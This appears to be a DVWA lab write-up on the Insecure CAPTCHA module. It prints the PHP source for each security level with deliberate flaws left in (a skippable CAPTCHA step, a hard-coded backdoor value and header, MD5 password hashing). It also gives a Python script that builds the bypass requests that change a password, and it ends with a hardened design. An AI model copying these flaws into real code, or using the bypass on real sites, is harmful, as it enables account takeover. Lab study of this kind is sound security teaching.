Insecure CAPTCHA
Insecure CAPTCHA means an insecurely implemented verification code. CAPTCHA is short for Completely Automated Public Turing Test to Tell Computers and Humans Apart. The CAPTCHA itself is not the problem here; the problem is the code around it, which can be bypassed.
To run this lab, fill in recaptcha_public_key and recaptcha_private_key in config.inc.php.
reCAPTCHA verification flow
LOW
Source code
vulnerabilities/captcha/source/low.php
<?php

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key'],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    else {
        // CAPTCHA was correct. Do both new passwords match?
        if( $pass_new == $pass_conf ) {
            // Show next stage for the user
            echo "
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
                <form action=\"#\" method=\"POST\">
                    <input type=\"hidden\" name=\"step\" value=\"2\" />
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                    <input type=\"submit\" name=\"Change\" value=\"Change\" />
                </form>";
        }
        else {
            // Both new passwords do not match.
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    }
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check to see if both password match
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the end user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with the passwords matching
        echo "<pre>Passwords did not match.</pre>";
        $hide_form = false;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>
The legacy signature is recaptcha_check_answer($privkey, $remoteip, $challenge, $response): $privkey is the private key the server obtained when registering, $remoteip is the user's IP address, $challenge is the value of the recaptcha_challenge_field field sent from the frontend page, and $response is the value of the recaptcha_response_field field. The DVWA wrapper used in the code above takes only two arguments, the private key and the g-recaptcha-response token posted by the widget, and returns true only when Google confirms that token.
Reading the code: when step=2 and the two passwords match, the new password is written straight to the database. No CAPTCHA check happens on that path.
With step=1 the CAPTCHA must be correct, so a request without a valid token fails and cannot change the password.
With step=2 the Google check is never called; matching passwords are all that is required, so posting step=2 directly changes the password.
Reproducing the flaw needs a connection to Google's reCAPTCHA servers, which from China means going through a proxy.
Medium
vulnerabilities/captcha/source/medium.php
<?php

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key' ],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    else {
        // CAPTCHA was correct. Do both new passwords match?
        if( $pass_new == $pass_conf ) {
            // Show next stage for the user
            echo "
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
                <form action=\"#\" method=\"POST\">
                    <input type=\"hidden\" name=\"step\" value=\"2\" />
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                    <input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />
                    <input type=\"submit\" name=\"Change\" value=\"Change\" />
                </form>";
        }
        else {
            // Both new passwords do not match.
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    }
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check to see if they did stage 1
    if( !$_POST[ 'passed_captcha' ] ) {
        $html     .= "<pre><br />You have not passed the CAPTCHA.</pre>";
        $hide_form = false;
        return;
    }

    // Check to see if both password match
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the end user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with the passwords matching
        echo "<pre>Passwords did not match.</pre>";
        $hide_form = false;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>
The Medium level adds a passed_captcha=true check, which changes nothing in substance: the flag is a hidden form field under the client's control, so the step and passed_captcha parameters still bypass the CAPTCHA.
With step=2 and passed_captcha=true the check is bypassed.
High
vulnerabilities/captcha/source/high.php
<?php

if( isset( $_POST[ 'Change' ] ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key' ],
        $_POST['g-recaptcha-response']
    );

    if (
        $resp ||
        (
            $_POST[ 'g-recaptcha-response' ] == 'hidd3n_valu3'
            && $_SERVER[ 'HTTP_USER_AGENT' ] == 'reCAPTCHA'
        )
    ){
        // CAPTCHA was correct. Do both new passwords match?
        if ($pass_new == $pass_conf) {
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for user
            echo "<pre>Password Changed.</pre>";
        } else {
            // Ops. Password mismatch
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    } else {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>
The server's logic is: when $resp (the result Google returns) is false, and the g-recaptcha-response parameter is not hidd3n_valu3 (or the User-Agent request header is not reCAPTCHA), the CAPTCHA is treated as wrong; otherwise the CAPTCHA check is treated as passed.
$resp is outside the attacker's control, but the second branch is not: setting the User-Agent header to reCAPTCHA and g-recaptcha-response to hidd3n_valu3 bypasses the check. This is a test hook that should never have shipped, and it is the reason "hidden" values and header checks are not a substitute for the real verification.
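The Low, Medium and High sections above each describe a request that changes the password without solving a CAPTCHA. The following is an added example, not DVWA's own code: it ports the branching of low.php, medium.php and high.php into one Python handler (the database write is replaced by the feedback string the server prints, and recaptcha_check_answer is a constructed stand-in that always reports failure, since the attacker has no solved token), builds the three bypass payloads, and shows the same payload as a real HTTP request. The base URL, session id and the DVWA security cookie format are assumptions for the live request, which is constructed but not sent.

```python
"""Added example: the three DVWA Insecure CAPTCHA levels modelled in Python,
with the attacker request that defeats each one.  The handler below ports the
branching of low.php / medium.php / high.php; the database write is replaced
by the feedback string the server prints."""
from __future__ import annotations
import urllib.request
from urllib.parse import urlencode


def recaptcha_check_answer(private_key: str, response: str) -> bool:
    """Constructed stand-in for DVWA's wrapper around Google's siteverify.
    Offline and without a token solved in the widget, Google says "no"."""
    return False


def change_password(level: str, post: dict, headers: dict) -> str:
    """Return the feedback the server would print; 'Password Changed.' is success."""
    if "Change" not in post:
        return ""
    captcha_ok = recaptcha_check_answer("<private key>", post.get("g-recaptcha-response", ""))
    pw_new, pw_conf = post.get("password_new"), post.get("password_conf")

    if level in ("low", "medium"):
        if post.get("step") == "1":
            if not captcha_ok:
                return "The CAPTCHA was incorrect. Please try again."
            return "You passed the CAPTCHA!" if pw_new == pw_conf else "Both passwords must match."
        if post.get("step") == "2":
            # medium only adds another client-controlled hidden field;
            # low does not re-check the CAPTCHA at all in stage 2
            if level == "medium" and not post.get("passed_captcha"):
                return "You have not passed the CAPTCHA."
            return "Password Changed." if pw_new == pw_conf else "Passwords did not match."
        return ""

    if level == "high":
        # the test hook left in high.php: magic response value plus a magic User-Agent
        backdoor = (post.get("g-recaptcha-response") == "hidd3n_valu3"
                    and headers.get("User-Agent") == "reCAPTCHA")
        if not (captcha_ok or backdoor):
            return "The CAPTCHA was incorrect. Please try again."
        return "Password Changed." if pw_new == pw_conf else "Both passwords must match."

    raise ValueError(f"unknown level {level!r}")


def bypass_request(level: str, new_password: str) -> tuple[dict, dict]:
    """POST body and headers that change the password without solving any CAPTCHA."""
    body = {"Change": "Change", "password_new": new_password, "password_conf": new_password}
    headers = {"User-Agent": "Mozilla/5.0"}
    if level == "low":
        body["step"] = "2"                              # jump straight to stage 2
    elif level == "medium":
        body["step"] = "2"
        body["passed_captcha"] = "true"                 # the hidden field is ours to set
    elif level == "high":
        body["g-recaptcha-response"] = "hidd3n_valu3"   # hard-coded value from high.php
        headers["User-Agent"] = "reCAPTCHA"
    else:
        raise ValueError(f"no bypass for level {level!r}")
    return body, headers


def build_live_request(base_url: str, level: str, phpsessid: str,
                       new_password: str) -> urllib.request.Request:
    """The same payload as a real HTTP request for a running DVWA instance.
    base_url and phpsessid are assumptions; DVWA reads the level from its
    'security' cookie.  The request is built, not sent, so this runs offline."""
    body, headers = bypass_request(level, new_password)
    headers["Cookie"] = f"PHPSESSID={phpsessid}; security={level}"
    return urllib.request.Request(f"{base_url}/vulnerabilities/captcha/",
                                  data=urlencode(body).encode(), headers=headers, method="POST")


if __name__ == "__main__":
    for lvl in ("low", "medium", "high"):
        body, hdrs = bypass_request(lvl, "pwned")
        print(f"{lvl:<7} -> {change_password(lvl, body, hdrs)}")
    # to fire it at a lab instance (after logging in and copying PHPSESSID):
    # urllib.request.urlopen(build_live_request("http://127.0.0.1/dvwa", "high", "<sid>", "pwned"))
```

The point the model makes explicit is that in all three levels the decision to write the password depends on values the client sends (a step number, a hidden field, a header and a magic string), never on state the server recorded when the CAPTCHA was actually verified.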
Impossible
vulnerabilities/captcha/source/impossible.php
<?php

if( isset( $_POST[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_new  = stripslashes( $pass_new );
    $pass_new  = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_new  = md5( $pass_new );

    $pass_conf = $_POST[ 'password_conf' ];
    $pass_conf = stripslashes( $pass_conf );
    $pass_conf = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_conf ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_conf = md5( $pass_conf );

    $pass_curr = $_POST[ 'password_current' ];
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key' ],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
    }
    else {
        // Check that the current password is correct
        $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
        $data->execute();

        // Do both new password match and was the current password correct?
        if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) {
            // Update the database
            $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
            $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
            $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
            $data->execute();

            // Feedback for the end user - success!
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Feedback for the end user - failed!
            echo "<pre>Either your current password is incorrect or the new passwords did not match.<br />Please try again.</pre>";
            $hide_form = false;
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
The Impossible level adds an Anti-CSRF token against CSRF, uses PDO prepared statements against SQL injection, and collapses the flow into a single request: the CAPTCHA is verified on the same request that writes the password, so there is no step number or hidden flag to forge and the check cannot be bypassed. It also requires the current password, so an attacker who does not know it cannot pass the check even with a solved CAPTCHA. (Passwords are still stored as unsalted MD5, which is a separate weakness the lab does not address.)
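The design above, written out as an added example rather than DVWA's own code: one request carries the CSRF token, the CAPTCHA token, the current password and the new password, and every decision is taken against state the server holds (the session's CSRF token, the stored password hash, the verifier's answer). It goes a little beyond impossible.php in two labelled ways: the password hash is salted PBKDF2 instead of bare MD5, and already-verified CAPTCHA tokens are remembered so a replay is refused locally even before Google would. The verifier is injected so the demo runs offline; google_siteverify shows the real shape of the call to https://www.google.com/recaptcha/api/siteverify but is not invoked. The user name, passwords and the fake_siteverify token rule are constructed test data.

```python
"""Added example (not DVWA code): a single-request password change that keeps
every check server-side, so the step / hidden-field / header bypasses
from the lower levels have nothing to attack."""
from __future__ import annotations
import hashlib
import hmac
import json
import secrets
import urllib.parse
import urllib.request
from typing import Callable


def google_siteverify(secret: str, token: str, remote_ip: str) -> bool:
    """Real shape of the reCAPTCHA v2 server-side check (needs network; not used offline)."""
    data = urllib.parse.urlencode({"secret": secret, "response": token, "remoteip": remote_ip}).encode()
    with urllib.request.urlopen("https://www.google.com/recaptcha/api/siteverify", data=data, timeout=5) as r:
        return json.load(r).get("success") is True


class PasswordChange:
    """One logged-in user's session.  verify_captcha is injected so the demo runs offline."""

    def __init__(self, user: str, current_password: str, verify_captcha: Callable[[str, str], bool]):
        self.user = user
        self.salt = secrets.token_bytes(16)
        self.stored_hash = self._hash(current_password)   # salted PBKDF2, not DVWA's bare md5
        self.verify_captcha = verify_captcha
        self.csrf_token = secrets.token_hex(16)            # lives in the session, never in a hidden field
        self.used_captcha_tokens: set[str] = set()         # local replay guard (assumption: in addition to Google's own)

    def _hash(self, password: str) -> str:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000).hex()

    def change_password(self, post: dict, remote_ip: str) -> str:
        # 1. anti-CSRF token from the session, compared in constant time
        if not hmac.compare_digest(post.get("user_token", "").encode(), self.csrf_token.encode()):
            return "CSRF token is incorrect."
        # 2. CAPTCHA verified on the very request that writes the password: there is no
        #    "step=2" or "passed_captcha" state for the client to forge
        token = post.get("g-recaptcha-response", "")
        if not token or token in self.used_captcha_tokens or not self.verify_captcha(token, remote_ip):
            return "The CAPTCHA was incorrect. Please try again."
        self.used_captcha_tokens.add(token)                # a token is good for exactly one attempt
        # 3. re-authentication: the current password must be right, checked in constant time
        current_ok = hmac.compare_digest(self._hash(post.get("password_current", "")).encode(),
                                         self.stored_hash.encode())
        new, conf = post.get("password_new", ""), post.get("password_conf", "")
        if not current_ok or not new or new != conf:
            return "Either your current password is incorrect or the new passwords did not match."
        self.stored_hash = self._hash(new)
        self.csrf_token = secrets.token_hex(16)            # rotate the token after a state change
        return "Password Changed."

    def check_login(self, password: str) -> bool:
        return hmac.compare_digest(self._hash(password).encode(), self.stored_hash.encode())


def fake_siteverify(token: str, remote_ip: str) -> bool:
    """Constructed offline verifier: tokens that start with 'solved-' count as solved once."""
    return token.startswith("solved-")


if __name__ == "__main__":
    svc = PasswordChange("admin", "password", fake_siteverify)
    print(svc.change_password({"step": "2", "passed_captcha": "true", "user_token": svc.csrf_token,
                               "password_new": "pwned", "password_conf": "pwned"}, "10.0.0.1"))
    print(svc.change_password({"user_token": svc.csrf_token, "g-recaptcha-response": "solved-1",
                               "password_current": "password", "password_new": "n3w",
                               "password_conf": "n3w"}, "10.0.0.1"))
```

Two choices matter more than the rest: the CAPTCHA result is consumed on the request that performs the sensitive action, so there is no intermediate "passed" state to carry in a form, and the comparisons on secrets (CSRF token, password hash) use hmac.compare_digest so a timing difference does not leak anything.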